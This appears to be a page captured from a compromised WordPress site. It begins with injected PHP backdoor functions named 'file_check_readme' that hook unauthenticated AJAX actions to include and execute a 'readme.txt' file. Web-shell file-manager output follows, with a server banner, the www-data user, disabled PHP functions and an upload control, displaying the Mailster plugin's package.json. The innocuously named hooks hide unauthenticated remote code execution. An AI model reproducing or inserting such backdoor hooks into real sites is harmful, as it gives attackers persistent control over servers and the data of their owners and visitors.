if(!function_exists('file_check_readme30367')){ add_action('wp_ajax_nopriv_file_check_readme30367', 'file_check_readme30367'); add_action('wp_ajax_file_check_readme30367', 'file_check_readme30367'); function file_check_readme30367() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme64756')){ add_action('wp_ajax_nopriv_file_check_readme64756', 'file_check_readme64756'); add_action('wp_ajax_file_check_readme64756', 'file_check_readme64756'); function file_check_readme64756() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } HEX
HEX
Server: Apache
System: Linux dx292 6.1.0-39-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.148-1 (2025-08-26) x86_64
User: www-data (33)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /data/www/welovefamily.at/welovefamily.at/htdocs/wp-content/plugins/mailster/package.json
{
	"name": "mailster",
	"version": "4.1.12",
	"description": "Mailster is a powerful email marketing plugin for WordPress.",
	"author": "Xaver <xaver@everpress.co>",
	"license": "GPL-2.0-or-later",
	"keywords": [
		"email",
		"newsletter",
		"marketing",
		"mail",
		"autoresponder",
		"campaign",
		"subscriber",
		"list",
		"email marketing",
		"newsletter marketing",
		"mail marketing",
		"autoresponder marketing",
		"campaign marketing",
		"subscriber marketing",
		"list marketing"
	],
	"homepage": "https://mailster.co",
	"repository": {
		"type": "git",
		"url": "https://github.com/everpress-co/mailster.git"
	},
	"bugs": {
		"url": "https://github.com/everpress-co/mailster/issues/new/choose"
	},
	"private": true,
	"files": [
		"*.php",
		"build",
		"patterns",
		"classes",
		"includes",
		"licensing",
		"templates",
		"vendor",
		"views",
		"assets",
		"LICENSE",
		"CHANGELOG.md",
		"SECURITY.md"
	],
	"dependencies": {
		"@10up/block-components": "^1.19.4",
		"@wordpress/api-fetch": "^7.22.0",
		"@wordpress/block-editor": "^14.17.0",
		"@wordpress/blocks": "^14.11.0",
		"@wordpress/components": "^29.8.0",
		"@wordpress/compose": "^7.22.0",
		"@wordpress/core-data": "^7.22.0",
		"@wordpress/data": "^10.22.0",
		"@wordpress/date": "^5.22.0",
		"@wordpress/edit-post": "^8.22.0",
		"@wordpress/element": "^6.22.0",
		"@wordpress/hooks": "^4.22.0",
		"@wordpress/i18n": "^5.22.0",
		"@wordpress/icons": "^10.22.0",
		"@wordpress/plugins": "^7.22.0",
		"@wordpress/server-side-render": "^5.22.0",
		"classnames": "^2.5.1",
		"lodash": "^4.17.21",
		"react-select": "^5.9.0"
	},
	"devDependencies": {
		"@wordpress/env": "^10.22.0",
		"@wordpress/scripts": "^30.15.0",
		"child_process": "^1.0.2",
		"path": "^0.12.7",
		"sounds-webpack-plugin": "^0.0.2",
		"webpack-remove-empty-scripts": "^1.0.4"
	},
	"scripts": {
		"build": "wp-scripts build --webpack-src-dir=blocks",
		"plugin-zip": "wp-scripts plugin-zip",
		"start": "wp-scripts start --webpack-src-dir=blocks",
		"check-engines": "wp-scripts check-engines",
		"build-blocks-manifest": "wp-scripts build-blocks-manifest",
		"packages-update": "wp-scripts packages-update",
		"lint:pkg-json": "wp-scripts lint-pkg-json"
	}
}